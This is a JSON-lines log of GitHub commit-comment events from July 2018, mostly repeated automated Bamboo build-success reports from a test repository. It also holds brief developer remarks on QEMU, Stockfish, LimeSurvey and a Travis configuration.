{"id":"7919717644","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598617,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-04T18:31:36Z","updated_at":"2018-07-04T18:31:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:31:36Z"}
{"id":"7919717653","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598618,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-04T18:31:36Z","updated_at":"2018-07-04T18:31:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:31:36Z"}
{"id":"7919719248","type":"CommitCommentEvent","actor":{"login":"mkirkman"},"repo":{"name":"mkirkman/MS-KMS"},"payload":{"comment":{"id":29598623,"position":null,"line":null,"path":null,"commit_id":"cfa3ee2ed5e09b1f95926cd3862a7ac772c63509","created_at":"2018-07-04T18:32:17Z","updated_at":"2018-07-04T18:32:17Z","author_association":"OWNER","body":"Frtx5xhv9h\r\n"}},"created_at":"2018-07-04T18:32:17Z"}
{"id":"7919720007","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29598628,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T18:32:35Z","updated_at":"2018-07-04T18:32:35Z","author_association":"OWNER","body":"I use QMP and other stuff from outside in qgraph.c, so deleting libqos-pc-obj-y will still produce some undefined symbols. However, I don't understand what should change from check-unit-y to check-qtest-pci-y, adding $(libqos-pc-obj-y) next to check-unit-y did not produce anything different."}},"created_at":"2018-07-04T18:32:35Z"}
{"id":"7919720114","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598629,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T18:32:38Z","updated_at":"2018-07-04T18:32:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:32:38Z"}
{"id":"7919720434","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598630,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-04T18:32:46Z","updated_at":"2018-07-04T18:32:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:32:46Z"}
{"id":"7919720455","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598631,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-04T18:32:46Z","updated_at":"2018-07-04T18:32:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:32:46Z"}
{"id":"7919723126","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598639,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-04T18:33:50Z","updated_at":"2018-07-04T18:33:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:33:50Z"}
{"id":"7919723388","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598641,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-04T18:33:56Z","updated_at":"2018-07-04T18:33:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:33:56Z"}
{"id":"7919723404","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598642,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-04T18:33:56Z","updated_at":"2018-07-04T18:33:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:33:56Z"}
{"id":"7919724405","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29598645,"position":null,"line":null,"path":null,"commit_id":"d4c0f41e74fc78047569bcc3b5c521fad9020fcb","created_at":"2018-07-04T18:34:20Z","updated_at":"2018-07-04T18:34:20Z","author_association":"NONE","body":"Introducing new code is difficult because it always overlaps with something existing\r\n\r\nAt line 434 of evaluate.cpp,\r\n```\r\n// Attacked squares defended at most once by our queen or king\r\n        weak =  attackedBy[Them][ALL_PIECES]\r\n              & ~attackedBy2[Us]\r\n              & (~attackedBy[Us][ALL_PIECES] | attackedBy[Us][KING] | attackedBy[Us][QUEEN]);\r\n```\r\n\r\nwhich translates at line 473, to 183 kingDanger units\r\n`+ 183 * popcount(kingRing[Us] & weak)`\r\n\r\nWell, this is not exactly your concept, since it applies to empty squares, pawns, and non pawns near the king, but it is quite close.\r\n\r\nSo maybe you can try to add some more\r\n`+ 183 * popcount(kingRing[Us] & weak)`\r\n`+   30 * popcount(kingRing[Us] & weak & attackedBy[Us][KING] & (pos.pieces(Us) ^pos.pieces(Us, PAWN)))`\r\n\r\n"}},"created_at":"2018-07-04T18:34:20Z"}
{"id":"7919726071","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598651,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-04T18:34:59Z","updated_at":"2018-07-04T18:34:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:34:59Z"}
{"id":"7919726296","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598652,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-04T18:35:06Z","updated_at":"2018-07-04T18:35:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:35:06Z"}
{"id":"7919726370","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598653,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-04T18:35:08Z","updated_at":"2018-07-04T18:35:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:35:08Z"}
{"id":"7919727495","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598655,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T18:35:33Z","updated_at":"2018-07-04T18:35:33Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-04T18:35:33Z"}
{"id":"7919729034","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598659,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-04T18:36:10Z","updated_at":"2018-07-04T18:36:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:36:10Z"}
{"id":"7919729356","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598660,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-04T18:36:18Z","updated_at":"2018-07-04T18:36:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:36:18Z"}
{"id":"7919729430","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598661,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-04T18:36:19Z","updated_at":"2018-07-04T18:36:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:36:19Z"}
{"id":"7919730167","type":"CommitCommentEvent","actor":{"login":"Patrykov"},"repo":{"name":"Patrykov/Contact-List"},"payload":{"comment":{"id":29598663,"position":null,"line":null,"path":null,"commit_id":"77044482154c5fe3e0b75a167fe0e8b5d2c2e75c","created_at":"2018-07-04T18:36:37Z","updated_at":"2018-07-04T18:36:37Z","author_association":"OWNER","body":"Readme"}},"created_at":"2018-07-04T18:36:37Z"}
{"id":"7919730232","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29598664,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-04T18:36:38Z","updated_at":"2018-07-04T18:36:38Z","author_association":"CONTRIBUTOR","body":"Hm, what happened to the other fix for ranking question? Does import and activate survey work?"}},"created_at":"2018-07-04T18:36:38Z"}
{"id":"7919730324","type":"CommitCommentEvent","actor":{"login":"sonwat"},"repo":{"name":"xionbit/ion"},"payload":{"comment":{"id":29598665,"position":21,"line":21,"path":".travis.yml","commit_id":"be53807fcc4810a2c29f8e42b1555c7c65740b47","created_at":"2018-07-04T18:36:40Z","updated_at":"2018-07-04T18:36:40Z","author_association":"MEMBER","body":"must be changed to ‘script: '\"make test\" ’"}},"created_at":"2018-07-04T18:36:40Z"}
{"id":"7919732158","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598667,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-04T18:37:21Z","updated_at":"2018-07-04T18:37:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:37:21Z"}
{"id":"7919732388","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598668,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-04T18:37:26Z","updated_at":"2018-07-04T18:37:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:37:26Z"}
{"id":"7919732392","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29598669,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T18:37:26Z","updated_at":"2018-07-04T18:37:26Z","author_association":"CONTRIBUTOR","body":"Hi Denis, this was mostly a joke. Me and Dominik was working with this problem, commited here: https://github.com/LimeSurvey/LimeSurvey/commit/00990367a1e06dd0a4773c9a48f1c820f9c456bc"}},"created_at":"2018-07-04T18:37:26Z"}
{"id":"7919732574","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598670,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-04T18:37:30Z","updated_at":"2018-07-04T18:37:30Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-04T18:37:30Z"}
{"id":"7919732663","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598672,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-04T18:37:32Z","updated_at":"2018-07-04T18:37:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:37:32Z"}
{"id":"7919732684","type":"CommitCommentEvent","actor":{"login":"loveorigami"},"repo":{"name":"loveorigami/yii2-notification-wrapper"},"payload":{"comment":{"id":29598673,"position":null,"line":null,"path":null,"commit_id":"0bc2c6761d68fdfcfb5ed3a94cbf5199c3830443","created_at":"2018-07-04T18:37:33Z","updated_at":"2018-07-04T18:37:33Z","author_association":"OWNER","body":"#21 "}},"created_at":"2018-07-04T18:37:33Z"}
{"id":"7919735152","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598684,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-04T18:38:32Z","updated_at":"2018-07-04T18:38:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:38:32Z"}
{"id":"7919735286","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598686,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-04T18:38:35Z","updated_at":"2018-07-04T18:38:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:38:35Z"}
